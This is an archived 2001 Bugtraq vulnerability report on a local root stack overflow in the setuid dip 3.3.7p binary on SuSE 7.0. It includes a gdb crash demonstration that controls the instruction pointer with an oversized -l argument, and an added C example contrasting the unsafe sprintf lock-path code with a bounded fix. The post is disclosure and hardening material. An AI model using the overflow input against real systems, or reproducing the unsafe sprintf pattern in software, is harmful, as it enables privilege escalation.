[21420] in bugtraq


dip 3.3.7p-overflow

daemon@ATHENA.MIT.EDU (sebi hegi)
Mon Jul 9 20:22:09 2001

From: sebi hegi <hegenbart@aon.at>
To: bugtraq@securityfocus.com
Date: Mon, 9 Jul 2001 20:33:37 +0200
Message-Id: <01070920432401.01023@faust>


Hi!
After doing a check on my SuSE Linux 7.0 x86 I found something interesting:

hegi@faust:~ > ls -la /usr/sbin/dip
-rwsr-xr--   1 root     dialout     62056 Jul 29  2000 /usr/sbin/dip

DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.

I considered this as a sort of old version and did some searching and found
something on insecure.org as well as on securityfocus.com.

Description: Standard overflow (in the -l option processing).
Author:  Goran Gajic <ggajic@AFRODITA.RCUB.BG.AC.YU>
Compromise: root (local)
Vulnerable Systems: Slackware Linux 3.4, presumably any other system using dip-3.3.7o or earlier suid root.
Date: 5 May 1998

Referring to a Bugtraq post from May 5, 1998 I did some research:

root@faust:/home/hegi > gdb /usr/sbin/dip
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols found)...
(gdb) run -k -l `perl -e 'print "a" x 130 '`
Starting program: /usr/sbin/dip -k -l `perl -e 'print "a" x 130 '`
DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.

DIP: cannot open /var/lock/LCK..aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Datei oder Verzeichnis nicht gefunden

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()

Looks like this version is still vulnerable although it went public in 1998
referring to securityfocus.com.

It's not world executable but still a security risk on SuSE 7.0. And I'm
wondering why at least SuSE still ships a product with a known vulnerability.
I was told that Slackware 7.1 ships the same version, which is vulnerable as well.

The vendor was contacted 3 years ago, still not patched.
( I wouldn't consider a sprintf so damn hard to patch. )

Have a nice day.
Sebastian Hegenbart

[attachment dip-exp.c omitted]
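Added example, not part of the post or of dip's own source: the sprintf-into-a-fixed-buffer pattern the post blames for the crash, beside a bounded replacement that rejects a name which would not fit or which contains a path separator. LOCK_PATH_MAX, the function names and the constructed inputs are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

#define LOCK_DIR "/var/lock/LCK.."
#define LOCK_PATH_MAX 128   /* assumed buffer size for illustration, not dip's real one */

/* The "before": the pattern the post blames. A fixed stack buffer is filled by
 * sprintf from an argument the caller controls, so 130 bytes of 'a' run past
 * the buffer and over the saved return address (hence "0x61616161 in ?? ()"). */
static void build_lock_path_unsafe(char *out, const char *name)
{
    sprintf(out, LOCK_DIR "%s", name);   /* no bound on strlen(name) */
}

/* The hardened form: bounded formatting, explicit truncation check, and a
 * sanity check on the name. Returns 0 on success and -1 when the name is
 * empty, contains a path separator, or would not fit including the NUL. */
static int build_lock_path(char *out, size_t outsz, const char *name)
{
    if (name == NULL || name[0] == '\0' || strchr(name, '/') != NULL)
        return -1;
    int n = snprintf(out, outsz, LOCK_DIR "%s", name);
    if (n < 0 || (size_t)n >= outsz) {   /* snprintf returns the length needed */
        if (outsz > 0) out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Try a constructed name of `len` bytes of 'a' (the post used 130) against
 * the hardened builder; returns its result. */
static int try_name_of_length(size_t len)
{
    char name[256], path[LOCK_PATH_MAX];
    if (len >= sizeof name) return -1;
    memset(name, 'a', len);
    name[len] = '\0';
    return build_lock_path(path, sizeof path, name);
}

int main(void)
{
    char path[LOCK_PATH_MAX];
    build_lock_path_unsafe(path, "ttyS0");            /* short name: fits either way */
    printf("unsafe builder, short name: %s\n", path);
    printf("hardened, \"ttyS0\": %d\n", build_lock_path(path, sizeof path, "ttyS0"));
    printf("hardened, 130 x 'a': %d\n", try_name_of_length(130));
    return 0;
}
```

With a 128-byte buffer and the 15-byte prefix, names up to 112 bytes are accepted and anything longer, including the post's 130-byte argument, is refused instead of overrunning the stack.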
